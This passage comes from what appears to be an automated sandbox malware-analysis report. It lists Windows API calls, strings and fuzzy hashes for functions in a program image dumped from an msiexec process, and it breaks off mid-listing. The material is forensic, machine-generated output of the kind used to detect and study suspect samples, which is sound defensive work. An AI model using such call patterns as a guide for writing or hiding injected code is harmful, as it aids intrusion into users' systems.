                                                                                              • Part of subcall function 0040BFF3: _memicmp.MSVCRT ref: 0040C00D
                                                                                              • Part of subcall function 0040BFF3: memcpy.MSVCRT(?,?,00000004,00000000,?,?,?,?,?,?,?,?,*.*,0040C2BF,00000000), ref: 0040C024
                                                                                            • memcpy.MSVCRT(00000000,?,00000004,00000000,?,?,?,?), ref: 0040C11B
                                                                                            • strchr.MSVCRT ref: 0040C140
                                                                                            • strchr.MSVCRT ref: 0040C151
                                                                                            • _strlwr.MSVCRT ref: 0040C15F
                                                                                            • memset.MSVCRT ref: 0040C17A
                                                                                            • CloseHandle.KERNEL32(00000000), ref: 0040C1C7
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000A.00000002.2878265705.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_10_2_400000_msiexec.jbxd
                                                                                            Similarity
                                                                                            • API ID: Filememcpystrchr$CloseHandlePointerSize_memicmp_strlwrmemset
                                                                                            • String ID: 4$h
                                                                                            • API String ID: 4019544885-1856150674
                                                                                            • Opcode ID: 74984e11edfdd2211d0d35a95e6cfe2b897958e94349246af9e5f94d48ef065d
                                                                                            • Instruction ID: ad7b68c589633d756b108d453181f98220e50dbf4ed18f1a1dc8c2c6e1bbf79d
                                                                                            • Opcode Fuzzy Hash: 74984e11edfdd2211d0d35a95e6cfe2b897958e94349246af9e5f94d48ef065d
                                                                                            • Instruction Fuzzy Hash: F531C2B2800218FEEB20EB54CC85EEE73BCEF05354F14416AF508A6181D7389F558FA9
                                                                                            APIs
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000A.00000002.2878265705.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_10_2_400000_msiexec.jbxd
                                                                                            Similarity
                                                                                            • API ID: Menu$Itemmemset$CountInfoModifywcscatwcschr
                                                                                            • String ID: 0$6
                                                                                            • API String ID: 4066108131-3849865405
                                                                                            • Opcode ID: 0289309123c9ab86839131df51d1afc7e9f627d47cda6d3754f054bafba8353e
                                                                                            • Instruction ID: 23fd2219eb4cf2a86962fa47610fb6a66e7712bfbd77636794901fa2ff6d3352
                                                                                            • Opcode Fuzzy Hash: 0289309123c9ab86839131df51d1afc7e9f627d47cda6d3754f054bafba8353e
                                                                                            • Instruction Fuzzy Hash: 1C317C72808344AFDB209F95D84499FB7E8FF84314F00493EFA48A2291D775D949CB5B
                                                                                            APIs
                                                                                            • memset.MSVCRT ref: 004082EF
                                                                                              • Part of subcall function 0040A6E6: WideCharToMultiByte.KERNEL32(0000FDE9,00000000,000003FF,000000FF,00000000,000003FF,00000000,00000000,0040B866,00445FAE,?,?,?,?,?,?), ref: 0040A6FF
                                                                                            • memset.MSVCRT ref: 00408362
                                                                                            • memset.MSVCRT ref: 00408377
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000A.00000002.2878265705.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_10_2_400000_msiexec.jbxd
                                                                                            Similarity
                                                                                            • API ID: memset$ByteCharMultiWide
                                                                                            • String ID:
                                                                                            • API String ID: 290601579-0
                                                                                            • Opcode ID: 0f4830a1bd5c139c57c95e775b3a7e0dd93a0ba2de61a1ec6096e44496360a03
                                                                                            • Instruction ID: eff1c4cb9ad8ed09cf65616da307521f953f8cb6273bc8e87bbfe44e88666a06
                                                                                            • Opcode Fuzzy Hash: 0f4830a1bd5c139c57c95e775b3a7e0dd93a0ba2de61a1ec6096e44496360a03
                                                                                            • Instruction Fuzzy Hash: E1716C72E0421DAFEF10EFA1EC82AEDB7B9EF04314F14406FE104B6191EB795A458B59
                                                                                            APIs
                                                                                            • memchr.MSVCRT ref: 00444EBF
                                                                                            • memcpy.MSVCRT(?,0044EB0C,0000000B,?,?,?,00000000,00000000,00000000), ref: 00444F63
                                                                                            • memcpy.MSVCRT(?,00000001,00000008,?,?,?,?,?,?,00000000,00000000,00000000), ref: 00444F75
                                                                                            • memcpy.MSVCRT(?,?,00000010,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 00444F9D
                                                                                            • memcpy.MSVCRT(?,0044EB0C,0000000B), ref: 00444FAF
                                                                                            • memcpy.MSVCRT(?,00000001,00000008), ref: 00444FC1
                                                                                            • memcpy.MSVCRT(PD,?,00000008,?,?), ref: 00445010
                                                                                            • memset.MSVCRT ref: 0044505E
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000A.00000002.2878265705.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_10_2_400000_msiexec.jbxd
                                                                                            Similarity
                                                                                            • API ID: memcpy$memchrmemset
                                                                                            • String ID: PD$PD
                                                                                            • API String ID: 1581201632-2312785699
                                                                                            • Opcode ID: 6e8d3b6fa2ff374e13542a5a9ce1d141d502757749890083bc1aee29b95d613b
                                                                                            • Instruction ID: 10fb1f61a141a907ee6ef334180a592a84e160db04a0c58349e49e3250f7ff3f
                                                                                            • Opcode Fuzzy Hash: 6e8d3b6fa2ff374e13542a5a9ce1d141d502757749890083bc1aee29b95d613b
                                                                                            • Instruction Fuzzy Hash: 8D5192719002196BDF10EF69CC85EEEBBBCAF45304F0444ABE555E7246E738E648CBA4
                                                                                            APIs
                                                                                            • GetSystemMetrics.USER32(00000011), ref: 00409F5B
                                                                                            • GetSystemMetrics.USER32(00000010), ref: 00409F61
                                                                                            • GetDC.USER32(00000000), ref: 00409F6E
                                                                                            • GetDeviceCaps.GDI32(00000000,00000008), ref: 00409F7F
                                                                                            • GetDeviceCaps.GDI32(00000000,0000000A), ref: 00409F86
                                                                                            • ReleaseDC.USER32(00000000,00000000), ref: 00409F8D
                                                                                            • GetWindowRect.USER32(?,?), ref: 00409FA0
                                                                                            • GetParent.USER32(?), ref: 00409FA5
                                                                                            • GetWindowRect.USER32(00000000,00000000), ref: 00409FC2
                                                                                            • MoveWindow.USER32(?,?,?,?,?,00000001), ref: 0040A021
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000A.00000002.2878265705.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_10_2_400000_msiexec.jbxd
                                                                                            Similarity
                                                                                            • API ID: Window$CapsDeviceMetricsRectSystem$MoveParentRelease
                                                                                            • String ID:
                                                                                            • API String ID: 2163313125-0
                                                                                            • Opcode ID: d78dd9667733c118ca5f823c40f75fbf68f042a28012a42387a4e68ecbaebf7d
                                                                                            • Instruction ID: e27d49e141fc924f5dc8bb17b5c2b7dfe0ac862298cc10f95babd1b5c1aaa95e
                                                                                            • Opcode Fuzzy Hash: d78dd9667733c118ca5f823c40f75fbf68f042a28012a42387a4e68ecbaebf7d
                                                                                            • Instruction Fuzzy Hash: 66318475A00209AFDF14CFB9CD85AEEBBB9FB48354F050579E901F3290DA70ED458A50
                                                                                            APIs
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000A.00000002.2878265705.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_10_2_400000_msiexec.jbxd
                                                                                            Similarity
                                                                                            • API ID: free$wcslen
                                                                                            • String ID:
                                                                                            • API String ID: 3592753638-3916222277
                                                                                            • Opcode ID: c7ce2940fe04b4405a0b219ffbd3b3dbc0b14a035c74dd75871d5eb09ab59b8c
                                                                                            • Instruction ID: 6c84a66137f0c35b9d0eb965e4703c645d554f15bb1c6f80accdbf0b715e4580
                                                                                            • Opcode Fuzzy Hash: c7ce2940fe04b4405a0b219ffbd3b3dbc0b14a035c74dd75871d5eb09ab59b8c
                                                                                            • Instruction Fuzzy Hash: 78614A70E0421ADADF28AF95E6485EEB771FF04315F60807BE411B62D1EBB84981CB5D
                                                                                            APIs
                                                                                            • memset.MSVCRT ref: 0040A47B
                                                                                            • _snwprintf.MSVCRT ref: 0040A4AE
                                                                                            • wcslen.MSVCRT ref: 0040A4BA
                                                                                            • memcpy.MSVCRT(?,?,?,?,?,00000400,%s (%s),?,?), ref: 0040A4D2
                                                                                            • wcslen.MSVCRT ref: 0040A4E0
                                                                                            • memcpy.MSVCRT(?,?,?,?,?,?,?,?,?,00000400,%s (%s),?,?), ref: 0040A4F3
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000A.00000002.2878265705.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_10_2_400000_msiexec.jbxd
                                                                                            Similarity
                                                                                            • API ID: memcpywcslen$_snwprintfmemset
                                                                                            • String ID: %s (%s)$YV@
                                                                                            • API String ID: 3979103747-598926743
                                                                                            • Opcode ID: 2040f1418fb7f55927111411806f4302e3b16a8f1d7874ce907b9bb2b5999412
                                                                                            • Instruction ID: 06bfc13611ed198a4270a5cd43788582667178ba612a9453d6f3368808cd6753
                                                                                            • Opcode Fuzzy Hash: 2040f1418fb7f55927111411806f4302e3b16a8f1d7874ce907b9bb2b5999412
                                                                                            • Instruction Fuzzy Hash: 31216F72900219BBDF21DF55CC45D8BB7B8BF04318F018466E948AB106DB74EA188BD9
                                                                                            APIs
                                                                                            • LoadLibraryExW.KERNEL32(netmsg.dll,00000000,00000002,?,?,?,?,00409764,?), ref: 0040A686
                                                                                            • FormatMessageW.KERNEL32(00001100,00000000,?,00000400,?,00000000,00000000,?,?,?,?,00409764,?), ref: 0040A6A4
                                                                                            • wcslen.MSVCRT ref: 0040A6B1
                                                                                            • wcscpy.MSVCRT ref: 0040A6C1
                                                                                            • LocalFree.KERNEL32(?,?,00000400,?,00000000,00000000,?,?,?,?,00409764,?), ref: 0040A6CB
                                                                                            • wcscpy.MSVCRT ref: 0040A6DB
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000A.00000002.2878265705.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_10_2_400000_msiexec.jbxd
                                                                                            Similarity
                                                                                            • API ID: wcscpy$FormatFreeLibraryLoadLocalMessagewcslen
                                                                                            • String ID: Unknown Error$netmsg.dll
                                                                                            • API String ID: 2767993716-572158859
                                                                                            • Opcode ID: 6af7a682c2b6d94d5c313714e0e524a7557e97864fcb7fd89b068039d1905f7d
                                                                                            • Instruction ID: f30f617898fcbe25dfcd40b25f3134c3ee1324ef56ff669fd92f7ad18b117fee
                                                                                            • Opcode Fuzzy Hash: 6af7a682c2b6d94d5c313714e0e524a7557e97864fcb7fd89b068039d1905f7d
                                                                                            • Instruction Fuzzy Hash: 77014772104214BFE7151B61EC46E9F7B3DEF06795F24043AF902B10D0DA7A5E10D69D
                                                                                            APIs
                                                                                              • Part of subcall function 00409B98: GetFileAttributesW.KERNELBASE(?,00445E12,?,?,?,00000104), ref: 00409B9C
                                                                                            • wcscpy.MSVCRT ref: 0040DAFB
                                                                                            • wcscpy.MSVCRT ref: 0040DB0B
                                                                                            • GetPrivateProfileIntW.KERNEL32(0045D668,rtl,00000000,0045D458), ref: 0040DB1C
                                                                                              • Part of subcall function 0040D65D: GetPrivateProfileStringW.KERNEL32(0045D668,?,0044E518,0045D6F8,?,0045D458), ref: 0040D679
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000A.00000002.2878265705.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_10_2_400000_msiexec.jbxd
                                                                                            Similarity
                                                                                            • API ID: PrivateProfilewcscpy$AttributesFileString
                                                                                            • String ID: TranslatorName$TranslatorURL$charset$general$rtl
                                                                                            • API String ID: 3176057301-2039793938
                                                                                            • Opcode ID: 3fbe58534c285a30a84b282ab535004845ea1880fa40ce6c2a5f8ae528691bae
                                                                                            • Instruction ID: a06b33177ff8c9e83df2ed587696004ed0fecc3b70d630751f385571f4afffd7
                                                                                            • Opcode Fuzzy Hash: 3fbe58534c285a30a84b282ab535004845ea1880fa40ce6c2a5f8ae528691bae
                                                                                            • Instruction Fuzzy Hash: A8F0F661EC061236D2213A761C07F2E26149FA3B93F05447BBC08771C7CA7E4A4DC69E
                                                                                            APIs
                                                                                            Strings
                                                                                            • cannot ATTACH database within transaction, xrefs: 0042F663
                                                                                            • database is already attached, xrefs: 0042F721
                                                                                            • too many attached databases - max %d, xrefs: 0042F64D
                                                                                            • database %s is already in use, xrefs: 0042F6C5
                                                                                            • attached databases must use the same text encoding as main database, xrefs: 0042F76F
                                                                                            • unable to open database: %s, xrefs: 0042F84E
                                                                                            • out of memory, xrefs: 0042F865
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000A.00000002.2878265705.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_10_2_400000_msiexec.jbxd
                                                                                            Similarity
                                                                                            • API ID: memcpymemset
                                                                                            • String ID: attached databases must use the same text encoding as main database$cannot ATTACH database within transaction$database %s is already in use$database is already attached$out of memory$too many attached databases - max %d$unable to open database: %s
                                                                                            • API String ID: 1297977491-2001300268
                                                                                            • Opcode ID: fafdf879e702536ae0a8da4e3c7de2ba30e48f0de6d41113ccb8534cd7e7e00e
                                                                                            • Instruction ID: 2d624c67d108d3170f37657fe85980b6deaf3b4166a4b31ce602698a835437d0
                                                                                            • Opcode Fuzzy Hash: fafdf879e702536ae0a8da4e3c7de2ba30e48f0de6d41113ccb8534cd7e7e00e
                                                                                            • Instruction Fuzzy Hash: 4791C131B00315AFDB10DF65E481B9ABBB0AF44318F94807FE8059B252D778E949CB59
                                                                                            APIs
                                                                                              • Part of subcall function 0040E8E0: ??3@YAXPAX@Z.MSVCRT(?,?,?,0040EB18), ref: 0040E8EC
                                                                                              • Part of subcall function 0040E8E0: ??3@YAXPAX@Z.MSVCRT(?,?,?,0040EB18), ref: 0040E8FA
                                                                                              • Part of subcall function 0040E8E0: ??3@YAXPAX@Z.MSVCRT(?,?,?,0040EB18), ref: 0040E90B
                                                                                              • Part of subcall function 0040E8E0: ??3@YAXPAX@Z.MSVCRT(?,?,?,0040EB18), ref: 0040E922
                                                                                              • Part of subcall function 0040E8E0: ??3@YAXPAX@Z.MSVCRT(?,?,?,0040EB18), ref: 0040E92B
                                                                                            • ??2@YAPAXI@Z.MSVCRT(00000000), ref: 0040EB3F
                                                                                            • ??2@YAPAXI@Z.MSVCRT(00000000,00000000), ref: 0040EB5B
                                                                                            • memcpy.MSVCRT(?,0045A248,00000014), ref: 0040EB80
                                                                                            • memcpy.MSVCRT(?,0045A234,00000014,?,0045A248,00000014), ref: 0040EB94
                                                                                            • ??2@YAPAXI@Z.MSVCRT(00000000), ref: 0040EC17
                                                                                            • ??2@YAPAXI@Z.MSVCRT(0000000C,00000000), ref: 0040EC21
                                                                                            • ??2@YAPAXI@Z.MSVCRT(00000000), ref: 0040EC59
                                                                                              • Part of subcall function 0040D134: GetModuleHandleW.KERNEL32(00000000,?,?,00402E6F), ref: 0040D173
                                                                                              • Part of subcall function 0040D134: LoadStringW.USER32(00000000,?,?), ref: 0040D20C
                                                                                              • Part of subcall function 0040D134: memcpy.MSVCRT(00000000,00000002,?,?,00402E6F), ref: 0040D24C
                                                                                              • Part of subcall function 0040D134: wcscpy.MSVCRT ref: 0040D1B5
                                                                                              • Part of subcall function 0040D134: wcslen.MSVCRT ref: 0040D1D3
                                                                                              • Part of subcall function 0040D134: GetModuleHandleW.KERNEL32(00000000), ref: 0040D1E1
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000A.00000002.2878265705.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_10_2_400000_msiexec.jbxd
                                                                                            Similarity
                                                                                            • API ID: ??2@??3@$memcpy$HandleModule$LoadStringwcscpywcslen
                                                                                            • String ID: ($d
                                                                                            • API String ID: 1140211610-1915259565
                                                                                            • Opcode ID: 612b475aad9d1d38ee13413eb206fefa6c5bad09ba85bb1eafc4472043e484bf
                                                                                            • Instruction ID: 92dd2811bdb74a70ba85f750b5b6098557f3982e7a927aadba8bcdb4291d1afd
                                                                                            • Opcode Fuzzy Hash: 612b475aad9d1d38ee13413eb206fefa6c5bad09ba85bb1eafc4472043e484bf
                                                                                            • Instruction Fuzzy Hash: D7518D71601704AFD724DF2AC586A5AB7F8FF48314F10892EE55ACB381DB75E9408B48
                                                                                            APIs
                                                                                            • LockFile.KERNEL32(?,40000000,00000000,00000001,00000000), ref: 004178DF
                                                                                            • Sleep.KERNEL32(00000001), ref: 004178E9
                                                                                            • GetLastError.KERNEL32 ref: 004178FB
                                                                                            • UnlockFile.KERNEL32(?,40000000,00000000,00000001,00000000), ref: 004179D3
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000A.00000002.2878265705.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_10_2_400000_msiexec.jbxd
                                                                                            Similarity
                                                                                            • API ID: File$ErrorLastLockSleepUnlock
                                                                                            • String ID:
                                                                                            • API String ID: 3015003838-0
                                                                                            • Opcode ID: 2bcaca4b1abb42dedd91daaceb1976ea0637d726691221ef1964d55ebaf63db6
                                                                                            • Instruction ID: bb7e89fefddb53edf96b8819cb9ac805ac4f8ca395f1f2490f4f27a155f14dd5
                                                                                            • Opcode Fuzzy Hash: 2bcaca4b1abb42dedd91daaceb1976ea0637d726691221ef1964d55ebaf63db6
                                                                                            • Instruction Fuzzy Hash: C741FFB515C3029FE3209F219C05BA7B7F1BFC4714F20092EF5A556280CBB9D8898A6E
                                                                                            APIs
                                                                                            • memset.MSVCRT ref: 00407E44
                                                                                            • memset.MSVCRT ref: 00407E5B
                                                                                            • _mbscpy.MSVCRT(?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00407E7E
                                                                                            • _mbscpy.MSVCRT(?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00407ED7
                                                                                            • _mbscpy.MSVCRT(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00407EEE
                                                                                            • _mbscpy.MSVCRT(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00407F01
                                                                                            • wcscpy.MSVCRT ref: 00407F10
                                                                                            • MultiByteToWideChar.KERNEL32(0000FDE9,00000000,?,000000FF,?,000003FF), ref: 00407F36
                                                                                            • MultiByteToWideChar.KERNEL32(0000FDE9,00000000,?,000000FF,?,000003FF), ref: 00407F50
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000A.00000002.2878265705.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_10_2_400000_msiexec.jbxd
                                                                                            Similarity
                                                                                            • API ID: _mbscpy$ByteCharMultiWidememset$wcscpy
                                                                                            • String ID:
                                                                                            • API String ID: 59245283-0
                                                                                            • Opcode ID: 2093e6e2fb276f324a3f34c95e94e469d6ba5033b990a3802bc2c4c250056f76
                                                                                            • Instruction ID: 836b70714d1948736637452a130addde846eabb024256fa404d9b75b59221f05
                                                                                            • Opcode Fuzzy Hash: 2093e6e2fb276f324a3f34c95e94e469d6ba5033b990a3802bc2c4c250056f76
                                                                                            • Instruction Fuzzy Hash: 2F4130B5900218AFDB20EB65CC81FDAB7FCBB09354F0085AAF559E7241DB34AB488F55
                                                                                            APIs
                                                                                            • memcpy.MSVCRT(004032AB,&quot;,0000000C,?,?,00000000,0040FDF6,?,?,?,<item>), ref: 00414EB6
                                                                                            • memcpy.MSVCRT(004032AB,&amp;,0000000A,?,?,00000000,0040FDF6,?,?,?,<item>), ref: 00414EE2
                                                                                            • memcpy.MSVCRT(004032AD,&lt;,00000008,?,?,00000000,0040FDF6,?,?,?,<item>), ref: 00414EFC
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000A.00000002.2878265705.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_10_2_400000_msiexec.jbxd
                                                                                            Similarity
                                                                                            • API ID: memcpy
                                                                                            • String ID: &amp;$&deg;$&gt;$&lt;$&quot;$<br>
                                                                                            • API String ID: 3510742995-3273207271
                                                                                            • Opcode ID: 369a3f9b1fd6758dbfbd8abebbf452156f2c7f188bb79599d954c26419b7cbea
                                                                                            • Instruction ID: c5e12263314fdcdd46b54c12ab2af12db27c873e0c2922b0206687d3a4296adb
                                                                                            • Opcode Fuzzy Hash: 369a3f9b1fd6758dbfbd8abebbf452156f2c7f188bb79599d954c26419b7cbea
                                                                                            • Instruction Fuzzy Hash: A601F576F8032071EA3020058C46FF70558FBF2B1AFA20127FD86292D5D28D0AC7929F
                                                                                            APIs
                                                                                            • OpenProcess.KERNEL32(00000410,00000000,00000000,?,?,00000000,?,004133E1,00000000,?), ref: 00413A7A
                                                                                            • memset.MSVCRT ref: 00413ADC
                                                                                            • memset.MSVCRT ref: 00413AEC
                                                                                              • Part of subcall function 00413959: wcscpy.MSVCRT ref: 00413982
                                                                                            • memset.MSVCRT ref: 00413BD7
                                                                                            • wcscpy.MSVCRT ref: 00413BF8
                                                                                            • CloseHandle.KERNEL32(?,3A,?,?,?,004133E1,00000000,?), ref: 00413C4E
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000A.00000002.2878265705.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_10_2_400000_msiexec.jbxd
                                                                                            Similarity
                                                                                            • API ID: memset$wcscpy$CloseHandleOpenProcess
                                                                                            • String ID: 3A
                                                                                            • API String ID: 3300951397-293699754
                                                                                            • Opcode ID: 8542788a6fbd662e622ac6317d91a932690acc9b8880ba19fbfc79209a0c02cc
                                                                                            • Instruction ID: 1dd795ac5698d536b98d54c3d0ab6bca04534a71b571f2ddc62e59a9adc8dd8d
                                                                                            • Opcode Fuzzy Hash: 8542788a6fbd662e622ac6317d91a932690acc9b8880ba19fbfc79209a0c02cc
                                                                                            • Instruction Fuzzy Hash: 3C514D71108341AFD720DF25DC84ADBB7E8FF84705F004A2EF59992291EB75DA44CBAA
                                                                                            APIs
                                                                                            • GetModuleHandleW.KERNEL32(00000000,?,?,00402E6F), ref: 0040D173
                                                                                            • wcscpy.MSVCRT ref: 0040D1B5
                                                                                              • Part of subcall function 0040D626: memset.MSVCRT ref: 0040D639
                                                                                              • Part of subcall function 0040D626: _itow.MSVCRT ref: 0040D647
                                                                                            • wcslen.MSVCRT ref: 0040D1D3
                                                                                            • GetModuleHandleW.KERNEL32(00000000), ref: 0040D1E1
                                                                                            • LoadStringW.USER32(00000000,?,?), ref: 0040D20C
                                                                                            • memcpy.MSVCRT(00000000,00000002,?,?,00402E6F), ref: 0040D24C
                                                                                              • Part of subcall function 0040D092: ??2@YAPAXI@Z.MSVCRT(00000000,0040D142,00402E6F), ref: 0040D0CC
                                                                                              • Part of subcall function 0040D092: ??2@YAPAXI@Z.MSVCRT(00000000,00000000,0040D142,00402E6F), ref: 0040D0EA
                                                                                              • Part of subcall function 0040D092: ??2@YAPAXI@Z.MSVCRT(00000000,00000000,00000000,0040D142,00402E6F), ref: 0040D108
                                                                                              • Part of subcall function 0040D092: ??2@YAPAXI@Z.MSVCRT(00000000,00000000,00000000,00000000,0040D142,00402E6F), ref: 0040D126
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000A.00000002.2878265705.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_10_2_400000_msiexec.jbxd
                                                                                            Similarity
                                                                                            • API ID: ??2@$HandleModule$LoadString_itowmemcpymemsetwcscpywcslen
                                                                                            • String ID: strings
                                                                                            • API String ID: 3166385802-3030018805
                                                                                            • Opcode ID: 1ff794482afb279d074c0027ae841dfa169eb318e5c6685fac8801d3cb652815
                                                                                            • Instruction ID: f4589d763452722e7ce024d248fd6f149fceb83749f413ad0df853fa0cd60d20
                                                                                            • Opcode Fuzzy Hash: 1ff794482afb279d074c0027ae841dfa169eb318e5c6685fac8801d3cb652815
                                                                                            • Instruction Fuzzy Hash: 78418D75D003109BD7369FA8ED809263365FF48306700047EE942972A7DEB9E886CB5D
                                                                                            APIs
                                                                                            • memset.MSVCRT ref: 0041249C
                                                                                            • ??2@YAPAXI@Z.MSVCRT(00002A88), ref: 004124D2
                                                                                            • ??2@YAPAXI@Z.MSVCRT(00000350), ref: 00412510
                                                                                            • GetModuleHandleW.KERNEL32(00000000,0000000E), ref: 00412582
                                                                                            • LoadIconW.USER32(00000000,00000065), ref: 0041258B
                                                                                            • wcscpy.MSVCRT ref: 004125A0
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000A.00000002.2878265705.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_10_2_400000_msiexec.jbxd
                                                                                            Similarity
                                                                                            • API ID: ??2@$HandleIconLoadModulememsetwcscpy
                                                                                            • String ID: r!A
                                                                                            • API String ID: 2791114272-628097481
                                                                                            • Opcode ID: b6d2b1e59ff3573d6768b080da9da4b7d6a9f96c7a56722062e34d2197ac4208
                                                                                            • Instruction ID: f2e108ad35b37ee9f58e8ef6409d1766b43f0b07df47584fb449e80907097569
                                                                                            • Opcode Fuzzy Hash: b6d2b1e59ff3573d6768b080da9da4b7d6a9f96c7a56722062e34d2197ac4208
                                                                                            • Instruction Fuzzy Hash: 0431A1B19013889FEB30EF669C896CAB7E8FF44314F00852FE90CCB241DBB946548B49
                                                                                            APIs
                                                                                            • GetModuleHandleW.KERNEL32(00000000,00000000,?,?), ref: 0040B5A5
                                                                                            • FindResourceW.KERNEL32(00000000,00000032,BIN), ref: 0040B5B6
                                                                                            • LoadResource.KERNEL32(00000000,00000000), ref: 0040B5C4
                                                                                            • SizeofResource.KERNEL32(?,00000000), ref: 0040B5D4
                                                                                            • LockResource.KERNEL32(00000000), ref: 0040B5DD
                                                                                            • memcpy.MSVCRT(00000000,00000000,00000000), ref: 0040B60D
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000A.00000002.2878265705.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_10_2_400000_msiexec.jbxd
                                                                                            Similarity
                                                                                            • API ID: Resource$FindHandleLoadLockModuleSizeofmemcpy
                                                                                            • String ID: BIN
                                                                                            • API String ID: 1668488027-1015027815
                                                                                            • Opcode ID: 6cadd12acd146c90b5568bc01b4485451bf9b169e768bef5838699a2d497f07b
                                                                                            • Instruction ID: e905eb6dc449d61379ecdc49350c1a2f8866219970738eecada31b95dd052af9
                                                                                            • Opcode Fuzzy Hash: 6cadd12acd146c90b5568bc01b4485451bf9b169e768bef5838699a2d497f07b
                                                                                            • Instruction Fuzzy Hash: 5E11C636C00225BBD7116BE2DC09AAFBA78FF85755F010476F81072292DB794D018BED
                                                                                            APIs
                                                                                            • memset.MSVCRT ref: 00411AF6
                                                                                              • Part of subcall function 00409BCA: GetModuleFileNameW.KERNEL32(00000000,00000000,00000104,0040DDBE,?,?,00000000,00000208,000000FF,00000000,00000104), ref: 00409BD5
                                                                                            • wcsrchr.MSVCRT ref: 00411B14
                                                                                            • wcscat.MSVCRT ref: 00411B2E
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000A.00000002.2878265705.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_10_2_400000_msiexec.jbxd
                                                                                            Similarity
                                                                                            • API ID: FileModuleNamememsetwcscatwcsrchr
                                                                                            • String ID: AE$.cfg$General$EA
                                                                                            • API String ID: 776488737-1622828088
                                                                                            • Opcode ID: b6de0e43a8c0916aab6107a9d450eab560a3e9a3f2f4477a4909840308f89baa
                                                                                            • Instruction ID: 09e7cc653f6f297407560738dd106e03d424c3973b250f6ebd227ee33dbedd02
                                                                                            • Opcode Fuzzy Hash: b6de0e43a8c0916aab6107a9d450eab560a3e9a3f2f4477a4909840308f89baa
                                                                                            • Instruction Fuzzy Hash: 9611B93250022C66DF20EF51DC85ACE7378FF54754F1004ABE908B7142DB74ABC88B99
                                                                                            APIs
                                                                                            • memset.MSVCRT ref: 0040D8BD
                                                                                            • GetDlgCtrlID.USER32(?), ref: 0040D8C8
                                                                                            • GetWindowTextW.USER32(?,?,00001000), ref: 0040D8DF
                                                                                            • memset.MSVCRT ref: 0040D906
